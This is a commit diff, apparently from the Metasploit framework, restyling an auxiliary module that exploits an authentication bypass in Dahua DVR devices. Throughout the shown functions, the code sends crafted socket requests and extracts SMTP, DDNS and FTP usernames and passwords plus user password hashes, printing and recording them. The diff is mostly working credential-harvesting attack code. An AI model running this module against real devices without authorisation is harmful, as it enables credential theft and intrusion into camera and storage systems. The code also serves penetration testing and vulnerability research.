Lots of style cleanup

2015-12-03 15:39:27 -08:00 · 2015-12-03 15:39:27 -08:00 · 72f7efd042
parent 4b30a56f15
commit 72f7efd042
1 changed files with 87 additions and 89 deletions
--- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb
+++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb
@ -103,25 +103,24 @@ class Metasploit3 < Msf::Auxiliary
  def grab_email
    connect
    sock.put(EMAIL)
-    if data = sock.get_once.split('&&')
+    return unless (response = sock.get_once)
-      print_status("Email Settings: @ #{rhost}:#{rport}!")
+    data = response.split('&&')
-      if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
+    return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
-        if mailhost = Regexp.last_match[1].split(':')
+    print_status("Email Settings: @ #{rhost}:#{rport}!")
-          print_status("  Server: #{mailhost[0]}") unless mailhost[0].nil?
+    if mailhost = Regexp.last_match[1].split(':')
-          print_status("  Server Port: #{mailhost[1]}") unless mailhost[1].nil?
+      print_status("  Server: #{mailhost[0]}") unless mailhost[0].nil?
-          print_status("  Destination Email: #{data[1]}") unless mailhost[1].nil?
+      print_status("  Server Port: #{mailhost[1]}") unless mailhost[1].nil?
-        end
+      print_status("  Destination Email: #{data[1]}") unless mailhost[1].nil?
-        if !data[5].nil? && !data[6].nil?
+    end
-          print_good("  SMTP User: #{data[5]}") unless data[5].nil?
+    if !data[5].nil? && !data[6].nil?
-          print_good("  SMTP Password: #{data[6]}") unless data[6].nil?
+      print_good("  SMTP User: #{data[5]}") unless data[5].nil?
-          muser = "#{data[5]}"
+      print_good("  SMTP Password: #{data[6]}") unless data[6].nil?
-          mpass = "#{data[6]}"
+      muser = "#{data[5]}"
-          mailserver = "#{mailhost[0]}"
+      mpass = "#{data[6]}"
-          mailport = "#{mailhost[1]}"
+      mailserver = "#{mailhost[0]}"
-          if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0
+      mailport = "#{mailhost[1]}"
-            report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil?
+      if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0
-          end
+        report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil?
        end
      end
    end
  end
@ -129,28 +128,26 @@ class Metasploit3 < Msf::Auxiliary
  def grab_ddns
    connect
    sock.put(DDNS)
-    if data = sock.get_once
+    return unless (response = sock.get_once)
-      data = data.split(/&&[0-1]&&/)
+    data = response.split(/&&[0-1]&&/)
-      data.each_with_index do |val, index|
+    data.each_with_index do |val, index|
-        if index > 0
+      next if index == 0
-          val = val.split("&&")
+      val = val.split("&&")
-          ddns_service = "#{val[0]}"
+      ddns_service = "#{val[0]}"
-          ddns_server = "#{val[1]}"
+      ddns_server = "#{val[1]}"
-          ddns_port = "#{val[2]}"
+      ddns_port = "#{val[2]}"
-          ddns_domain = "#{val[3]}"
+      ddns_domain = "#{val[3]}"
-          ddns_user = "#{val[4]}"
+      ddns_user = "#{val[4]}"
-          ddns_pass = "#{val[5]}"
+      ddns_pass = "#{val[5]}"
-          print_status("DDNS Settings @ #{rhost}:#{rport}!:")
+      print_status("DDNS Settings @ #{rhost}:#{rport}!:")
-          print_status("  DDNS Service: #{ddns_service}")
+      print_status("  DDNS Service: #{ddns_service}")
-          print_status("  DDNS Server:  #{ddns_server}")
+      print_status("  DDNS Server:  #{ddns_server}")
-          print_status("  DDNS Port: #{ddns_port}")
+      print_status("  DDNS Port: #{ddns_port}")
-          print_status("  Domain: #{ddns_domain}")
+      print_status("  Domain: #{ddns_domain}")
-          print_good("  Username: #{ddns_user}")
+      print_good("  Username: #{ddns_user}")
-          print_good("  Password: #{ddns_pass}")
+      print_good("  Password: #{ddns_pass}")
-          if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0
+      if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0
-            report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
+        report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
          end
        end
      end
    end
  end
@ -158,28 +155,29 @@ class Metasploit3 < Msf::Auxiliary
  def grab_nas
    connect
    sock.put(NAS)
-    if data = sock.get_once
+    return unless (data = sock.get_once)
-      print_status("Nas Settings @ #{rhost}:#{rport}!:")
+    print_status("Nas Settings @ #{rhost}:#{rport}!:")
-      server = ''
+    server = ''
-      port = ''
+    port = ''
-      if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/
+    if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/
-        server = Regexp.last_match[1].unpack('C*').join('.')
+      server = Regexp.last_match[1].unpack('C*').join('.')
-        port = Regexp.last_match[2].unpack('S')
+      port = Regexp.last_match[2].unpack('S')
-        print_status("  Nas Server #{server}")
+      print_status("  Nas Server #{server}")
-        print_status("  Nas Port: #{port}")
+      print_status("  Nas Port: #{port}")
-      end
+    end
-      if data =~ /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/
+    if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data
      ftpuser.strip!
      ftppass.strip!
      unless ftpuser.blank? || ftppass.blank?
        print_good("  FTP User: #{ftpuser}")
        print_good("  FTP Password: #{ftppass}")
-        if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0
+        report_creds(
-          report_creds(
+          host: server,
-            host: server,
+          port: port,
-            port: port,
+          user: ftpuser,
-            user: ftpuser,
+          pass: ftppass,
-            pass: ftppass,
+          type: "FTP",
-            type: "FTP",
+          active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil?
            active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil?
        end
      end
    end
  end
@ -198,40 +196,40 @@ class Metasploit3 < Msf::Auxiliary
  def grab_users
    connect
    sock.put(USERS)
-    if data = sock.get_once.split('&&')
+    return unless (response = sock.get_once)
-      usercount = 0
+    data = response.split('&&')
-      print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!")
+    usercount = 0
-      data.each do |val|
+    print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!")
-        usercount += 1
+    data.each do |val|
-        pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}"
+      usercount += 1
-        value = pass.split(":")
+      pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}"
-        user = "#{value[1]}"
+      value = pass.split(":")
-        md5hash = "#{value[2]}"
+      user = "#{value[1]}"
-        print_status("  #{val[/(([\d]+)[:]([[:print:]]+))/]}")
+      md5hash = "#{value[2]}"
-        # Write the dahua hash to the database
+      print_status("  #{val[/(([\d]+)[:]([[:print:]]+))/]}")
-        hash = "#{rhost} #{user}:$dahua$#{md5hash}"
+      # Write the dahua hash to the database
-        report_hash(rhost, rport, user, hash)
+      hash = "#{rhost} #{user}:$dahua$#{md5hash}"
-        # Write the vulnerability to the database
+      report_hash(rhost, rport, user, hash)
-        report_vuln(
+      # Write the vulnerability to the database
-          host: rhost,
+      report_vuln(
-          port: rport,
+        host: rhost,
-          proto: 'tcp',
+        port: rport,
-          sname: 'dvr',
+        proto: 'tcp',
-          name: 'Dahua Authentication Password Hash Exposure',
+        sname: 'dvr',
-          info: "Obtained password hash for user #{user}: #{md5hash}",
+        name: 'Dahua Authentication Password Hash Exposure',
-          refs: references
+        info: "Obtained password hash for user #{user}: #{md5hash}",
-        )
+        refs: references
-      end
+      )
    end
  end
  def grab_groups
    connect
    sock.put(GROUPS)
-    if data = sock.get_once.split('&&')
+    return unless (response = sock.get_once)
-      print_good("#{peer} -- groups:")
+    data = response.split('&&')
-      data.each { |val| print_status("  #{val[/(([\d]+)[:]([\w]+))/]}") }
+    print_good("#{peer} -- groups:")
-    end
+    data.each { |val| print_status("  #{val[/(([\d]+)[:]([\w]+))/]}") }
  end
  def reset_user